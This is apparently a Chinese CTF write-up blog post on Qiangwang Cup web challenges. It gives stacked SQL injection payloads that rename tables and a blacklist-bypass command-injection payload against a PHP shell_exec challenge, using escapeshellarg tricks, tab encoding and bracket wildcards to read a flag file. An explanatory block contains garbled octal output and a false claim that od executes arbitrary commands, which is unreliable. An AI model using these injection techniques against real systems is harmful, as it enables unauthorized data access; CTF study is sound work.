<!DOCTYPE html><html lang="ch" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>强网杯--nss | Hexo</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><script>var config = {"root":"/","search":{"preload":true,"activeHolder":"键入以继续","blurHolder":"数据检索","noResult":"无 $0 相关数据"},"code":{"codeInfo":"$0 - 共 $1 行","copy":"复制","copyFinish":"复制成功","expand":"展开"}}</script><script src="//unpkg.com/mermaid@9.2.2/dist/mermaid.min.js"></script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/brands.min.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/fontawesome.min.css"><link rel="stylesheet" href="/css/arknights.css"><script>if (window.localStorage.getItem('theme-mode') === 'light') document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark') document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.ttf");
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}
@font-face {
 font-family: 'Font Awesome 6 Brands';
 src: local('Font Awesome 6 Brands'), url('/lib/fontawesome/fa-brands.woff2') format('woff2');
}
@font-face {
 font-family: 'Font Awesome 6 Free';
 src: local('Font Awesome 6 Free'), url('/lib/fontawesome/fa-regular.woff2') format('woff2');
}</style><style>:root {
  --dark-background: url('https://ak.hypergryph.com/assets/index/images/ak/pc/bk.jpg');
  --light-background: url('/img/bk.jpg');
}</style><meta name="generator" content="Hexo 6.3.0"></head><body><div class="loading" style="opacity: 0"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><nav><div class="navBtn hide"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="数据检索" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>强网杯--nss</h1><div id="post-info"><span>文章发布时间: <div class="control"><time datetime="2023-05-21T14:21:55.000Z" id="date"> 2023-05-21</time></div></span><br><span>最后更新时间: <div class="control"><time datetime="2023-05-22T03:33:03.936Z" id="updated"> 2023-05-22</time></div></span></div></div><hr><div id="post-content"><h1>[强网杯 2019]随便注</h1>
<p>很经典的一道题，利用这题复习复习堆叠注入</p>
<p>还是前期测试</p>
<p class='item-img' data-src='/2023/05/21/%E5%BC%BA%E7%BD%91%E6%9D%AF-nss/image-20230521223034815.png'><img src="/2023/05/21/%E5%BC%BA%E7%BD%91%E6%9D%AF-nss/image-20230521223034815.png" alt="image-20230521223034815"></p>
<p>用单引号闭合是这样的，如果注释一下</p>
<p class='item-img' data-src='/2023/05/21/%E5%BC%BA%E7%BD%91%E6%9D%AF-nss/image-20230521223109359.png'><img src="/2023/05/21/%E5%BC%BA%E7%BD%91%E6%9D%AF-nss/image-20230521223109359.png" alt="image-20230521223109359"></p>
<p>回显正常，所以可以判断是单引号</p>
<p>然后一直正常判断</p>
<p>1’ union select 1,2#</p>
<p class='item-img' data-src='/2023/05/21/%E5%BC%BA%E7%BD%91%E6%9D%AF-nss/image-20230521223214205.png'><img src="/2023/05/21/%E5%BC%BA%E7%BD%91%E6%9D%AF-nss/image-20230521223214205.png" alt="image-20230521223214205"></p>
<p>返回了黑名单</p>
<p>看看过滤我们选择使用堆叠注入，堆叠注入就是使用多条语句一起执行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">1&#x27;;show databases;#<br>1&#x27;;show tables;#<br>0&#x27;;show columns from `1919810931114514`;#<br><br>0&#x27;;RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;show columns from words;#<br><br>0&#x27; or &#x27;1&#x27;=&#x27;1<br><br>https://www.freebuf.com/articles/web/250705.html<br></code></pre></td></tr></table></figure>
<h1>[广东强网杯 2021 团队组]love_Pokemon</h1>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><code class="hljs php"> <span class="hljs-meta">&lt;?php</span><br><span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);<br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><span class="hljs-variable">$dir</span> = <span class="hljs-string">&#x27;sandbox/&#x27;</span> . <span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-variable">$_SERVER</span>[<span class="hljs-string">&#x27;REMOTE_ADDR&#x27;</span>]) . <span class="hljs-string">&#x27;/&#x27;</span>;<br><br><span class="hljs-keyword">if</span>(!<span class="hljs-title function_ invoke__">file_exists</span>(<span class="hljs-variable">$dir</span>))&#123;<br>    <span class="hljs-title function_ invoke__">mkdir</span>(<span class="hljs-variable">$dir</span>);<br>&#125;<br><br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">DefenderBonus</span>(<span class="hljs-params"><span class="hljs-variable">$Pokemon</span></span>)</span>&#123;<br>    <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&quot;/&#x27;| |_|\\$|;|l|s|flag|a|t|m|r|e|j|k|n|w|i|\\\\|p|h|u|v|\\+|\\^|\`|\~|\||\&quot;|\&lt;|\&gt;|\=|&#123;|&#125;|\!|\&amp;|\*|\?|\(|\)/i&quot;</span>,<span class="hljs-variable">$Pokemon</span>))&#123;<br>        <span class="hljs-keyword">die</span>(<span class="hljs-string">&#x27;catch broken Pokemon! mew-_-two&#x27;</span>);<br>    &#125;<br>    <span class="hljs-keyword">else</span>&#123;<br>        <span class="hljs-keyword">return</span> <span class="hljs-variable">$Pokemon</span>;<br>    &#125;<br><br>&#125;<br><br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">ghostpokemon</span>(<span class="hljs-params"><span class="hljs-variable">$Pokemon</span></span>)</span>&#123;<br>    <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">is_array</span>(<span class="hljs-variable">$Pokemon</span>))&#123;<br>        <span class="hljs-keyword">foreach</span> (<span class="hljs-variable">$Pokemon</span> <span class="hljs-keyword">as</span> <span class="hljs-variable">$key</span> =&gt; <span class="hljs-variable">$pks</span>) &#123;<br>            <span class="hljs-variable">$Pokemon</span>[<span class="hljs-variable">$key</span>] = <span class="hljs-title function_ invoke__">DefenderBonus</span>(<span class="hljs-variable">$pks</span>);<br>        &#125;<br>    &#125;<br>    <span class="hljs-keyword">else</span>&#123;<br>        <span class="hljs-variable">$Pokemon</span> = <span class="hljs-title function_ invoke__">DefenderBonus</span>(<span class="hljs-variable">$Pokemon</span>);<br>    &#125;<br>&#125;<br><br><span class="hljs-keyword">switch</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;myfavorite&#x27;</span>] ?? <span class="hljs-string">&quot;&quot;</span>)&#123;<br>    <span class="hljs-keyword">case</span> <span class="hljs-string">&#x27;picacu!&#x27;</span>:<br>        <span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-string">&#x27;picacu!&#x27;</span>).<span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-variable">$_SERVER</span>[<span class="hljs-string">&#x27;REMOTE_ADDR&#x27;</span>]);<br>        <span class="hljs-keyword">break</span>;<br>    <span class="hljs-keyword">case</span> <span class="hljs-string">&#x27;bulbasaur!&#x27;</span>:<br>        <span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-string">&#x27;miaowa!&#x27;</span>).<span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-variable">$_SERVER</span>[<span class="hljs-string">&#x27;REMOTE_ADDR&#x27;</span>]);<br>        <span class="hljs-variable">$level</span> = <span class="hljs-variable">$_POST</span>[<span class="hljs-string">&quot;levelup&quot;</span>] ?? <span class="hljs-string">&quot;&quot;</span>;<br>    <span class="hljs-keyword">if</span> ((!<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&#x27;/lv100/i&#x27;</span>,<span class="hljs-variable">$level</span>)) &amp;&amp; (<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&#x27;/lv100/i&#x27;</span>,<span class="hljs-title function_ invoke__">escapeshellarg</span>(<span class="hljs-variable">$level</span>))))&#123;<br>            <span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">file_get_contents</span>(<span class="hljs-string">&#x27;./hint.php&#x27;</span>);<br>        &#125;<br>        <span class="hljs-keyword">break</span>;<br>    <span class="hljs-keyword">case</span> <span class="hljs-string">&#x27;squirtle&#x27;</span>:<br>        <span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-string">&#x27;jienijieni!&#x27;</span>).<span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-variable">$_SERVER</span>[<span class="hljs-string">&#x27;REMOTE_ADDR&#x27;</span>]);<br>        <span class="hljs-keyword">break</span>;<br>    <span class="hljs-keyword">case</span> <span class="hljs-string">&#x27;mewtwo&#x27;</span>:<br>        <span class="hljs-variable">$dream</span> = <span class="hljs-variable">$_POST</span>[<span class="hljs-string">&quot;dream&quot;</span>] ?? <span class="hljs-string">&quot;&quot;</span>;<br>        <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">strlen</span>(<span class="hljs-variable">$dream</span>)&gt;=<span class="hljs-number">20</span>)&#123;<br>            <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;So Big Pokenmon!&quot;</span>);<br>        &#125;<br>        <span class="hljs-title function_ invoke__">ghostpokemon</span>(<span class="hljs-variable">$dream</span>);<br>        <span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">shell_exec</span>(<span class="hljs-variable">$dream</span>);<br>&#125;<br><br><span class="hljs-meta">?&gt;</span> <br></code></pre></td></tr></table></figure>
<p>代码审计</p>
<p>最近有点浮躁，这个现在开始慢慢写题，一定要吃透</p>
<p>这里有一个escapeshellarg函数，用p神文章学习</p>
<p><a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/escapeshellarg-and-parameter-injection.html">https://www.leavesongs.com/PENETRATION/escapeshellarg-and-parameter-injection.html</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_43085611/article/details/119523915">https://blog.csdn.net/qq_43085611/article/details/119523915</a></p>
<p><code>escapeshellarg</code> 利用的关键点：</p>
<ul>
<li>参数注入：当开发人员错误的使用，可能导致代码执行。</li>
<li>代码执行：去掉字符串中的不可见字符。</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">if</span> ((!<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&#x27;/lv100/i&#x27;</span>,<span class="hljs-variable">$level</span>)) &amp;&amp; (<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&#x27;/lv100/i&#x27;</span>,<span class="hljs-title function_ invoke__">escapeshellarg</span>(<span class="hljs-variable">$level</span>))))&#123;<br>            <span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">file_get_contents</span>(<span class="hljs-string">&#x27;./hint.php&#x27;</span>);<br>        &#125;<br></code></pre></td></tr></table></figure>
<p>这里有一个利用的条件，没有lv100，但是经过escapeshellarg处理，得有lv100，</p>
<p>这个函数的作用有去掉字符串中的不可见字符</p>
<p>好的输入一个</p>
<p>lv%FF100</p>
<p>hint</p>
<p class='item-img' data-src='/2023/05/21/%E5%BC%BA%E7%BD%91%E6%9D%AF-nss/image-20230522092849499.png'><img src="/2023/05/21/%E5%BC%BA%E7%BD%91%E6%9D%AF-nss/image-20230522092849499.png" alt="image-20230522092849499"></p>
<p class='item-img' data-src='/2023/05/21/%E5%BC%BA%E7%BD%91%E6%9D%AF-nss/image-20230522092945559.png'><img src="/2023/05/21/%E5%BC%BA%E7%BD%91%E6%9D%AF-nss/image-20230522092945559.png" alt="image-20230522092945559"></p>
<p>然后就是命令执行</p>
<p>因为我们常见的命令执行都已经被过滤了</p>
<p>“od” 是 Unix / Linux 操作系统中的一个命令，用于将文件或输入流中的数据转换为八进制、十六进制或其他格式的可打印 ASCII 字符表示。它通常用于查看二进制文件的内容、比较不同版本的文件，或者将二进制数据转换为可读的字符。</p>
<p>“od” 命令可以接受多种参数和选项，以便将数据转换为不同的格式。例如，使用 “-c” 选项可以将数据转换为可打印的 ASCII 字符表示，而使用 “-x” 选项可以将数据转换为十六进制格式。</p>
<p>下面是一个使用 “od” 命令将文件内容转换为八进制格式的示例：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">od -b /path/to/file<br></code></pre></td></tr></table></figure>
<p>在这个示例中，我们使用 “od” 命令将 “/path/to/file” 文件的内容转换为八进制格式，并在命令行终端中输出结果。输出结果类似于下面这样：</p>
<p>apache</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">0000000 211 114 105 116 101  040 104 79  114  102  041 其中，每一行表示文件的一部分内容，第一列是该部分内容在文件中的偏移量（以八进制格式表示），后面的列是该部分内容的八进制表示。在这个示例中，第一行的八进制表示为 &quot;211 114 105 116 101 040 104 79 114 102 041&quot;，对应的 ASCII 字符为 &quot;# Linux ELF&quot;。<br><br>在本例中，攻击者可以使用 &quot;od&quot; 命令来执行任意命令，因为黑名单过滤器没有过滤掉 &quot;od&quot; 字符串。攻击者可以使用 &quot;-c&quot; 选项将文件内容转换为可打印 ASCII 字符表示，并将其输出到命令行终端中，从而执行任意命令。这种漏洞称为命令执行绕过漏洞，是一种常见的安全问题。<br></code></pre></td></tr></table></figure>
<p>这里传入的内容长度不能超过20个字符，然后经过一个黑名单过滤，最后会放入到shell_exec()执行。我们查看黑名单中的字符，发现od并没有过滤，使用od -c命令也能读取文件内容，example:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs plaintext"># od -c /flag<br><br>0000000   f   l   a   g   &#123;   s   u   c   c   e   s   s   !   &#125;  \n<br>0000017<br></code></pre></td></tr></table></figure>
<p>然后就是构造出 FLAG 字符串，这里用到了[]通配的形式，由于黑名单中有A和L这两个字符，因此构造F[D-Z][@-Z]G，这样就能匹配上ASCII表中的@到Z之间的所有字符。</p>
<p>这种[]通配符还是很少见的，当?和*被ban了之后还是很好用的</p>
<p>最后是空格的绕过，这里用到了%09</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">payload：<br><br>myfavorite=mewtwo&amp;dream=od%09-c%09/F[D-Z][@-Z]G<br></code></pre></td></tr></table></figure>
<p>会出来flag</p>
<p class='item-img' data-src='/2023/05/21/%E5%BC%BA%E7%BD%91%E6%9D%AF-nss/image-20230522101350652.png'><img src="/2023/05/21/%E5%BC%BA%E7%BD%91%E6%9D%AF-nss/image-20230522101350652.png" alt="image-20230522101350652"></p>
<p class='item-img' data-src='/2023/05/21/%E5%BC%BA%E7%BD%91%E6%9D%AF-nss/image-20230522101034694.png'><img src="/2023/05/21/%E5%BC%BA%E7%BD%91%E6%9D%AF-nss/image-20230522101034694.png" alt="image-20230522101034694"></p>
<p>但是这样格式是不对的</p>
<p class='item-img' data-src='/2023/05/21/%E5%BC%BA%E7%BD%91%E6%9D%AF-nss/image-20230522101056959.png'><img src="/2023/05/21/%E5%BC%BA%E7%BD%91%E6%9D%AF-nss/image-20230522101056959.png" alt="image-20230522101056959"></p>
<p>我测试了一下这样是有地址的，所以我们需要删除0000020和00000040</p>
<p>ok</p>
<h1>[强网杯 2019]高明的黑客</h1>
<p>跑脚本的以前复现过现在不搞了</p>
<h1>[强网杯 2019]upload</h1>
<p>环境是坏的，文件传不上去</p>
<div id="paginator"></div></div><div id="post-footer"><div id="pages"><div class="footer-link" style="width: 50%;text-align:right;border-right:1px #fe2 solid"><a href="/2023/05/22/%E7%BE%8A%E5%9F%8E%E6%9D%AF/">← Next 羊城杯</a></div><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2023/05/18/HNCTF-2022-WEEk2/">HNCTF-2022-WEEk2 Prev →</a></div></div></div></div><div class="bottom-btn"><div><a id="to-top" onClick="scrolls.scrolltop();" title="回到顶部" style="opacity: 0; display: none;">∧</a><a id="to-index" href="#toc-div" title="文章目录">≡</a><a id="color-mode" onClick="colorMode.change()" title="切换主题"></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="https://ak.hypergryph.com/assets/index/images/ak/pc/faction/1.png" alt="Logo"></a><h1 id="Dr"><a href="/">Dr0se</a></h1><div id="description"><p></p></div></div><div id="aside-block"><div id="toc-div"><h1>目录</h1><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">1.</span> <span class="toc-text">[强网杯 2019]随便注</span></a></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">2.</span> <span class="toc-text">[广东强网杯 2021 团队组]love_Pokemon</span></a></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">3.</span> <span class="toc-text">[强网杯 2019]高明的黑客</span></a></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">4.</span> <span class="toc-text">[强网杯 2019]upload</span></a></li></ol></div></div><footer><nobr>构建自 <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> 使用主题 <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr>主题作者 <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas><script src="/js/search.js"></script><script src="/js/arknights.js"></script><script src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script src="/js/pjax.js"></script><script class="pjax-js">reset= () => {code.findCode();
document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script></body></html>